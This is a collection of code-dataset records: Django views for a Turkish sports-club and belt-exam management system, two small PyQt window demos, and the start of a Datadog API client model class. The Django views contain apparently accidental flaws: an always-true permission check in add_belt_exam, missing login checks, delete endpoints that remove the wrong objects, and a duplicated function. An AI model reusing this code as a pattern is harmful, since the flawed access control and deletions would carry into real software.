request.POST\n\n try:\n order = datatables.get('order[0][column]')\n # print('test=', order)\n draw = int(datatables.get('draw'))\n # print(\"draw degeri =\", draw)\n # Ambil start\n start = int(datatables.get('start'))\n # print(\"start degeri =\", start)\n # Ambil length (limit)\n length = int(datatables.get('length'))\n # print(\"lenght degeri =\", length)\n # Ambil data search\n search = datatables.get('search[value]')\n # print(\"search degeri =\", search)\n except:\n draw = 1\n start = 0\n length = 10\n\n if length == -1:\n modeldata = SportsClub.objects.all().order_by('-creationDate')\n total = modeldata.count()\n\n # clüp hepsi\n\n else:\n if search:\n\n modeldata = SportsClub.objects.filter(\n Q(name__icontains=search) | Q(shortName__icontains=search) | Q(clubMail__icontains=search))\n\n total = modeldata.count()\n\n # print(modeldata)\n\n\n else:\n modeldata = SportsClub.objects.all().order_by('-creationDate')[\n start:start + length]\n total = SportsClub.objects.all().count()\n\n say = start + 1\n start = start + length\n page = start / length\n\n beka = []\n\n for item in modeldata:\n athlete = Athlete.objects.filter(licenses__sportsClub=item).count()\n uye = item.clubUser.all().count()\n\n data = {\n 'say': say,\n 'pk': item.pk,\n\n 'name': item.name,\n\n 'uye': uye,\n #\n 'athlete': athlete,\n 'coach': item.coachs.all().count(),\n\n }\n beka.append(data)\n say += 1\n\n order = int(order)\n if order != 0:\n if order == 1:\n beka.sort(key=lambda item: item['name'], reverse=False)\n elif order == 2:\n beka.sort(key=lambda item: item['uye'], reverse=True)\n elif order == 3:\n beka.sort(key=lambda item: item['athlete'], reverse=True)\n elif order == 4:\n beka.sort(key=lambda item: item['coach'], reverse=True)\n else:\n beka.sort(key=lambda item: item['say'], reverse=False)\n\n response = {\n\n 'data': beka,\n 'draw': draw,\n 'recordsTotal': total,\n 'recordsFiltered': total,\n\n }\n\n return JsonResponse(response)\n\n\n\n\n\n@login_required\ndef return_club_person(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user_form = UserSearchForm()\n user = request.user\n club_user_array=SportClubUser.objects.none()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n sportsclup = request.POST.get('sportsClub')\n\n\n\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email or sportsclup):\n club_user_array = []\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n club_user_array = SportClubUser.objects.filter(sportsclub__in=clubsPk).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n club_user_array = SportClubUser.objects.all()\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n if sportsclup:\n query &=Q(sportsclub__name__icontains=sportsclup)\n\n club_user_array = []\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n club_user_array = SportClubUser.objects.filter(sportsclub__in=clubsPk).filter(query).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n club_user_array = SportClubUser.objects.filter(query).distinct()\n\n sportclup = SearchClupForm(request.POST, request.FILES or None)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.all()\n\n return render(request, 'kulup/kulup-uyeleri.html', {'athletes': club_user_array, 'user_form': user_form,'Sportclup':sportclup})\n\n\n@login_required\ndef return_club_role(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n club_role_form = ClubRoleForm()\n\n if request.method == 'POST':\n\n club_role_form = ClubRoleForm(request.POST)\n\n if club_role_form.is_valid():\n\n clubrole = ClubRole(name=club_role_form.cleaned_data['name'])\n clubrole.save()\n messages.success(request, 'Kulüp Üye Rolü Başarıyla Kayıt Edilmiştir.')\n return redirect('sbs:kulup-uye-rolu')\n\n else:\n\n messages.warning(request, 'Alanları Kontrol Ediniz')\n club_role = ClubRole.objects.all()\n return render(request, 'kulup/kulup-uye-rolu.html',\n {'club_role_form': club_role_form, 'club_role': club_role})\n\n\n@login_required\ndef deleteClubRole(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = ClubRole.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef deleteClubUser(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportClubUser.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef deleteClubUserFromClub(request, pk, club_pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportClubUser.objects.get(pk=pk)\n club = SportsClub.objects.get(pk=club_pk)\n\n club.clubUser.remove(obj)\n\n log = str(club) + \" Klup üyesi cikarildi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n club.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef deleteCoachFromClub(request, pk, club_pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = Coach.objects.get(pk=pk)\n club = SportsClub.objects.get(pk=club_pk)\n\n club.coachs.remove(obj)\n\n log = str(club) + \" Klup antrenör cikarildi\"\n log = general_methods.logwrite(request, request.user, log)\n club.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'delete successfully'})\n except ClubRole.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef updateClubRole(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n clubrole = ClubRole.objects.get(id=pk)\n clubrole_form = ClubRoleForm(request.POST or None, instance=clubrole)\n\n if request.method == 'POST':\n if clubrole_form.is_valid():\n clubrole_form.save()\n messages.success(request, 'Başarıyla Güncellendi')\n return redirect('sbs:kulup-uye-rolu')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kulupRolDuzenle.html',\n {'clubrole_form': clubrole_form})\n\n\n@login_required\ndef clubDelete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef clubUpdate(request, pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n club = SportsClub.objects.get(id=pk)\n\n if request.user.groups.filter(name='KulupUye'):\n if not (club.clubUser.filter(user=request.user)):\n return redirect('sbs:kulupler')\n\n athletes = Athlete.objects.filter(licenses__sportsClub=club)\n\n\n try:\n com_id = club.communication.pk\n communication = Communication.objects.get(id=com_id)\n communication_form = CommunicationForm(request.POST or None, instance=communication)\n except:\n communication_form = CommunicationForm(request.POST or None)\n\n club_form = ClubForm(request.POST or None, request.FILES or None, instance=club)\n clubPersons = club.clubUser.all()\n clubCoachs = club.coachs.all()\n if request.method == 'POST':\n if club_form.is_valid():\n club_form.save()\n\n if not club.communication:\n communication = communication_form.save(commit=False)\n communication.save()\n club.communication=communication\n club.save()\n\n\n else:\n communication_form.save()\n\n log = str(club) + \" Klup güncellendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n messages.success(request, 'Başarıyla Güncellendi')\n return redirect('sbs:update-club', club.pk)\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kulupDuzenle.html',\n {'club_form': club_form, 'communication_form': communication_form, 'clubPersons': clubPersons,\n 'athletes': athletes,\n 'club': club, 'clubCoachs': clubCoachs})\n\n\n@login_required\ndef choose_coach(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n coaches = Coach.objects.all()\n user_form = UserSearchForm()\n if request.method == 'POST':\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email):\n messages.warning(request, 'Lütfen Arama Kriteri Giriniz.')\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n coaches = Coach.objects.filter(query)\n user_form = UserSearchForm(request.POST)\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n students = [int(x) for x in athletes1]\n instances = Coach.objects.filter(id__in=students)\n club = SportsClub.objects.get(pk=pk)\n for coach in instances:\n club.coachs.add(coach)\n club.save()\n messages.success(request, 'Antrenör Başarıyla Eklenmiştir.')\n\n return redirect('sbs:update-club', pk=pk)\n\n return render(request, 'antrenor/antrenorsec.html', {'coaches': coaches, 'user_form': user_form})\n\n\n@login_required\ndef choose_sport_club_user(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n sportClubUsers = SportClubUser.objects.all()\n user_form = UserSearchForm()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n athletes1 = request.POST.getlist('selected_options')\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email):\n print('')\n # messages.warning(request, 'Lütfen Arama Kriteri Giriniz.')\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n sportClubUsers = SportClubUser.objects.filter(query)\n if athletes1:\n students = [int(x) for x in athletes1]\n instances = SportClubUser.objects.filter(id__in=students)\n\n club = SportsClub.objects.get(pk=pk)\n for club_user in instances:\n club.clubUser.add(club_user)\n club.save()\n\n log = str(club) + \" Klup uyesi ekledi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Eklenmiştir.')\n\n return redirect('sbs:update-club', pk=pk)\n\n return render(request, 'kulup/kulupuyesisec.html', {'coaches': sportClubUsers, 'user_form': user_form})\n\n\n@login_required\ndef return_belt_exams(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user = request.user\n\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n\n exams = BeltExam.objects.filter(sportClub__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exams = BeltExam.objects.all()\n\n return render(request, 'kulup/kusak-sinavlari.html', {'exams': exams})\n\n\ndef detail_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n return render(request, 'kulup/kusak-sinavi-incele.html', {'exam': exam})\n\n\n@login_required\ndef approve_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n # her onaya geldiginde kuşaklari bir üst seviyeye göndermesini engelledik.\n if exam.status!=BeltExam.APPROVED:\n athletes = exam.athletes.all()\n for athlete in athletes:\n level = Level()\n # level.startDate = exam.examDate\n # level.levelType = EnumFields.LEVELTYPE.BELT\n # lastLevel = athlete.belts.last()\n # lastDefinition = lastLevel.definition\n # level.definition = lastDefinition.parent\n # level.status = Level.APPROVED\n # level.save()\n # athlete.belts.add(level)\n # athlete.save()\n\n\n\n exam.status = BeltExam.APPROVED\n exam.save()\n messages.success(request, 'Sınav Onaylanmıştır.')\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n\n\ndef denied_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam = BeltExam.objects.get(pk=pk)\n exam.status = exam.DENIED\n exam.save()\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n\n\n# sporcu seç\n@login_required\ndef choose_athlete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n sinav = BeltExam.objects.get(pk=pk)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubsPk = []\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n for club in clubs:\n clubsPk.append(club.pk)\n exam_athlete = []\n for item in sinav.athletes.all():\n exam_athlete.append(item.user.pk)\n athletes = Athlete.objects.filter(licenses__sportsClub__in=clubsPk).exclude(belts=None).exclude(licenses=None).exclude(beltexam__athletes__user__in = exam_athlete).filter(licenses__branch=sinav.branch,licenses__status='Onaylandı').filter(belts__branch=sinav.branch,belts__status='Onaylandı').distinct()\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_athlete=[]\n for item in sinav.athletes.all():\n exam_athlete.append(item.user.pk)\n # print(sinav.branch)\n athletes=Athlete.objects.exclude(belts=None).exclude(licenses=None).exclude(beltexam__athletes__user__in = exam_athlete).filter(licenses__branch=sinav.branch,licenses__status='Onaylandı').filter(belts__branch=sinav.branch,belts__status='Onaylandı')\n # .exclude(belts__definition__parent_id=None) eklenmeli ama eklendigi zaman kuşaklarindan bir tanesi en üst olunca almıyor\n if request.method == 'POST':\n\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n for x in athletes1:\n sinav.athletes.add(x)\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n return render(request, 'kulup/kusak-sınavı-antroner-sec.html', {'athletes': athletes})\n\n\n@login_required\ndef choose_coach_clup(request, pk):\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n clup = SportsClub.objects.get(pk=pk)\n\n coachsPk = []\n for coach in clup.coachs.all():\n coachsPk.append(coach.pk)\n athletes = Coach.objects.exclude(id__in=coachsPk)\n\n # license.athlete_set.first\n\n if request.method == 'POST':\n coach = request.POST.getlist('selected_options')\n if coach:\n for coa in coach:\n clup.coachs.add(Coach.objects.get(pk=coa))\n clup.save()\n\n log = str(clup) + \" Klup antrenor ekledi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n return redirect('sbs:update-club', pk=pk)\n return render(request, 'antrenor/Antrenor-sec.html', {'athletes': athletes})\n\n\n\n\n\n\n\n\n\n\n@login_required\ndef choose_coach(request, pk):\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n sinav = BeltExam.objects.get(pk=pk)\n athletes = Coach.objects.none()\n # .filter(grades__branch=sinav.branch) eklenmeli\n coa=[]\n for item in sinav.coachs.all():\n coa.append(item.user.pk)\n athletes = Coach.objects.filter(grades__branch=sinav.branch,grades__status='Onaylandı').exclude(beltexam__coachs__user_id__in=coa).filter(visa__startDate__year=timezone.now().year).exclude(grades=None).exclude(visa=None).exclude(grades__definition__name='1.Kademe').exclude(grades__definition=None).distinct()\n # for fd in coach:\n # for visa in fd.visa.all():\n # if(date(sinav.examDate.year,sinav.examDate.month,sinav.examDate.day)-date(visa.creationDate.year,visa.creationDate.month,visa.creationDate.day)).days<365:\n # athletes|=Coach.objects.filter(pk=fd.pk).distinct()\n\n if request.method == 'POST':\n athletes1 = request.POST.getlist('selected_options')\n if athletes1:\n for x in athletes1:\n if not sinav.coachs.all().filter(beltexam__coachs__user_id=x):\n sinav.coachs.add(x)\n sinav.save()\n return redirect('sbs:kusak-sinavi-incele', pk=pk)\n return render(request, 'kulup/kusak-sınavı-antroner-sec.html', {'athletes': athletes})\n\n\n@login_required\ndef add_belt_exam(request):\n perm = general_methods.control_access(request),\n if not perm:\n logout(request)\n return redirect('accounts:login')\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n user = request.user\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n # print(club.dataAccessControl)\n clubsPk.append(club.pk)\n exam_form.fields['sportClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_form.fields['sportClub'].queryset = SportsClub.objects.all()\n\n if request.method == 'POST':\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n if exam_form.is_valid():\n exam = exam_form.save()\n messages.success(request, 'Sınav başarıyla oluşturuldu')\n return redirect('sbs:kusak-sinavlari')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n return render(request, 'kulup/kusak-sinavi-ekle.html', {'exam_form': exam_form})\n\n\n@login_required\ndef update_belt_exam(request, pk):\n # print('kusak sinavi düzenle çalisti')\n perm = general_methods.control_access(request)\n if not perm:\n logout(request)\n return redirect('accounts:login')\n sinav = BeltExam.objects.get(pk=pk)\n # license_form = LicenseForm(request.POST or None, request.FILES or None, instance=license,initial={'sportsClub': license.sportsClub})\n # print(sinav.sportClub)\n exam_form = BeltExamForm(request.POST or None, request.FILES or None, instance=sinav,\n initial={'sportsClub': sinav.sportClub.name})\n # print(exam_form)\n user = request.user\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n exam_form.fields['sportClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n exam_form.fields['sportClub'].queryset = SportsClub.objects.all()\n\n if request.method == 'POST':\n exam_form = BeltExamForm(request.POST, request.FILES or None)\n if exam_form.is_valid():\n exam = exam_form.save()\n messages.success(request, 'Sınav başarıyla güncellendi')\n return redirect('sbs:kusak-sinavlari')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kusak-sinavi-güncelle.html', {'exam_form': exam_form})\n\n\n@login_required\ndef delete_belt_exam(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n else:\n return JsonResponse({'status': 'Fail', 'msg': 'Not a valid request'})\n\n\n@login_required\ndef updateClubPersonsProfile(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user = request.user\n club_user = SportClubUser.objects.get(user=user)\n person = Person.objects.get(pk=club_user.person.pk)\n communication = Communication.objects.get(pk=club_user.communication.pk)\n user_form = DisabledUserForm(request.POST or None, instance=user)\n person_form = DisabledPersonForm(request.POST or None, request.FILES or None, instance=person)\n communication_form = DisabledCommunicationForm(request.POST or None, instance=communication)\n club_form = DisabledSportClubUserForm(request.POST or None, instance=club_user)\n password_form = SetPasswordForm(request.user, request.POST)\n\n if request.method == 'POST':\n data = request.POST.copy()\n person_form = DisabledPersonForm(data)\n\n if len(request.FILES) > 0:\n person.profileImage = request.FILES['profileImage']\n person.save()\n messages.success(request, 'Profil Fotoğrafı Başarıyla Güncellenmiştir.')\n\n if password_form.is_valid():\n user.set_password(password_form.cleaned_data['new_password2'])\n user.save()\n update_session_auth_hash(request, user)\n messages.success(request, 'Şifre Başarıyla Güncellenmiştir.')\n return redirect('sbs:kulup-uyesi-profil-guncelle')\n\n return render(request, 'kulup/kulup-uyesi-profil-guncelle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'password_form': password_form, 'club_form': club_form})\n\n\n@login_required\ndef Exam_list_antroner_delete(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method == 'POST' and request.is_ajax():\n try:\n obj = SportsClub.objects.get(pk=pk)\n obj.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n except SportsClub.DoesNotExist:\n return JsonResponse({'status': 'Fail', 'msg': 'Object does not exist'})\n\n\n# listeden antroner sil\n\n@login_required\ndef choose_coach_remove(request, pk, exam_pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n sinav = BeltExam.objects.get(pk=exam_pk)\n sinav.coachs.remove(Coach.objects.get(pk=pk))\n\n return redirect('sbs:kusak-sinavi-incele', pk=exam_pk)\n\n\n@login_required\ndef choose_athlete_remove(request, pk, exam_pk):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n sinav = BeltExam.objects.get(pk=exam_pk)\n sinav.athletes.remove(Athlete.objects.get(pk=pk))\n\n return redirect('sbs:kusak-sinavi-incele', pk=exam_pk)\n","sub_path":"sbs/Views/ClubViews.py","file_name":"ClubViews.py","file_ext":"py","file_size_in_byte":48673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568065191","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt import QtWidgets\n# QtCore.QTextCodec.setCodecForTr(QTextCodec.codecForName(\"utf8\"))\n\n\nclass SplitterWidget(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(SplitterWidget, self).__init__(parent)\n\n mainSplitter = QtWidgets.QSplitter(QtCore.Qt.Horizontal, self)\n\n leftText = QtWidgets.QTextEdit((u\"左窗口
sldjflksjdklf\"), mainSplitter)\n leftText.setAlignment(QtCore.Qt.AlignCenter)\n\n rightSplitter = QtWidgets.QSplitter(QtCore.Qt.Vertical, mainSplitter)\n rightSplitter.setOpaqueResize(False)\n\n upText = QtWidgets.QTextEdit((u\"上窗口\"), rightSplitter)\n upText.setAlignment(QtCore.Qt.AlignCenter)\n\n bottomText = QtWidgets.QTextEdit((u\"下窗口\"), rightSplitter)\n bottomText.setAlignment(QtCore.Qt.AlignCenter)\n\n mainSplitter.setStretchFactor(1, 20)\n rightSplitter.setStretchFactor(2, 1)\n # mainSplitter.setWindowTitle((\"分割窗口\"))\n\n self.setCentralWidget(mainSplitter)\n\n\nclass MainWidget(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(MainWidget,self).__init__(parent)\n self.setWindowTitle((u\"依靠窗口\"))\n\n widget = SplitterWidget()\n\n self.setCentralWidget(widget)\n\n #停靠窗口 1\n dock1=QtWidgets.QDockWidget((u\"停靠窗口 1\"),self)\n dock1.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable)\n dock1.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)\n te1=QtWidgets.QTextEdit((u\"窗口 1,可在 Main Window 的左部和右部停靠,不可浮动,不可关闭\"))\n dock1.setWidget(te1)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock1)\n\n #停靠窗口 2\n dock2=QtWidgets.QDockWidget((u\"停靠窗口 2\"),self)\n dock2.setFeatures(QtWidgets.QDockWidget.DockWidgetFloatable|QtWidgets.QDockWidget.DockWidgetClosable)\n # dock2.setTitleBarWidget()\n te2=QtWidgets.QTextEdit((u\"窗口 2,只可浮动\"))\n dock2.setWidget(te2)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock2)\n\n #停靠窗口 2\n dock4=QtWidgets.QDockWidget((u\"停靠窗口 4\"),self)\n dock4.setFeatures(QtWidgets.QDockWidget.DockWidgetFloatable|QtWidgets.QDockWidget.DockWidgetClosable)\n te4=QtWidgets.QTextEdit((u\"窗口 4,只可浮动\"))\n dock4.setWidget(te4)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea,dock4)\n\n #停靠窗口 3\n dock3=QtWidgets.QDockWidget((u\"停靠窗口 3\"),self)\n dock3.setFeatures(QtWidgets.QDockWidget.AllDockWidgetFeatures)\n te3=QtWidgets.QTextEdit((u\"窗口 3,可在 Main Window 任意位置停靠,可浮动,可关闭\"))\n dock3.setWidget(te3)\n self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,dock3)\n\n #dock1 和dock4 合并\n self.tabifyDockWidget(dock1, dock4)\n\n\nif __name__ == \"__main__\":\n app=QApplication(sys.argv)\n main=MainWidget()\n main.show()\n app.exec_()","sub_path":"dog/untitled1/test_1/pyqtlayout26_03_v01.py","file_name":"pyqtlayout26_03_v01.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352067254","text":"from PyQt4.QtCore import *\r\nfrom PyQt4.QtGui import *\r\n\r\nfrom DatabaseForGUI import *\r\n\r\nclass OtherGUI(QMainWindow):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n \r\n self._parent = parent\r\n self.setWindowTitle(\"This is my other window\")\r\n\r\n # Create label and line edit\r\n self._name_label = QLabel(\"List of teachers\")\r\n self._teacher_list = QComboBox()\r\n \r\n self._tableview = QTableView()\r\n \r\n self.PopulateTeacherComboBox()\r\n self.PopulateTableView()\r\n\r\n # Create button\r\n self._close_button = QPushButton(\"Close\")\r\n\r\n # Create a vertical box layout to put the label, line edit and button into\r\n self._layout = QVBoxLayout()\r\n\r\n # Add the widgets to the vertical box layout\r\n self._layout.addWidget(self._name_label)\r\n self._layout.addWidget(self._teacher_list)\r\n self._layout.addWidget(self._tableview)\r\n self._layout.addWidget(self._close_button)\r\n\r\n # We then need to set the layout for the QMainWindow. However, we can't\r\n # use the setLayout method as it doesn't work properly. Therefore, put\r\n # the layout inside a widget and call setCentralWidget on the QMainWindow.\r\n self._widget = QWidget()\r\n self._widget.setLayout(self._layout)\r\n\r\n self.setCentralWidget(self._widget)\r\n\r\n # Connect up the button to some method, in this case 'add_name'\r\n self._close_button.clicked.connect(self.onCloseClicked)\r\n \r\n def onCloseClicked(self):\r\n # Close the window\r\n #self._parent.setHidden(False)\r\n self.close()\r\n\r\n def PopulateTeacherComboBox(self):\r\n teachers = g_database.GetAllTeachers()\r\n for teacher in teachers:\r\n self._teacher_list.addItem(teacher[1])\r\n \r\n def PopulateTableView(self):\r\n teachers = g_database.GetAllTeachers()\r\n model = QStandardItemModel()\r\n row = 0\r\n for teacher in teachers:\r\n for column in range(2):\r\n item = QStandardItem(\"{}\".format(teacher[column]))\r\n model.setItem(row, column, item)\r\n row+=1\r\n \r\n self._tableview.setModel(model)","sub_path":"Implementation/OtherGUI.py","file_name":"OtherGUI.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529218521","text":"# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2019-Present Datadog, Inc.\nfrom __future__ import annotations\n\nfrom typing import Union, TYPE_CHECKING\n\nfrom datadog_api_client.model_utils import (\n ModelNormal,\n cached_property,\n unset,\n UnsetType,\n)\n\n\nif TYPE_CHECKING:\n from datadog_api_client.v2.model.rum_aggregation_function import RUMAggregationFunction\n from datadog_api_client.v2.model.rum_compute_type import RUMComputeType\n\n\nclass RUMCompute(ModelNormal):\n @cached_property\n def openapi_types(_):\n from datadog_api_client.v2.model.rum_aggregation_function import RUMAggregationFunction\n from datadog_api_client.v2.model.rum_compute_type import RUMComputeType\n\n return {\n \"aggregation\": (RUMAggregationFunction,),\n \"interval\": (str,),\n \"metric\": (str,),\n \"type\": (RUMComputeType,),\n }\n\n attribute_map = {\n \"aggregation\": \"aggregation\",\n \"interval\": \"interval\",\n \"metric\": 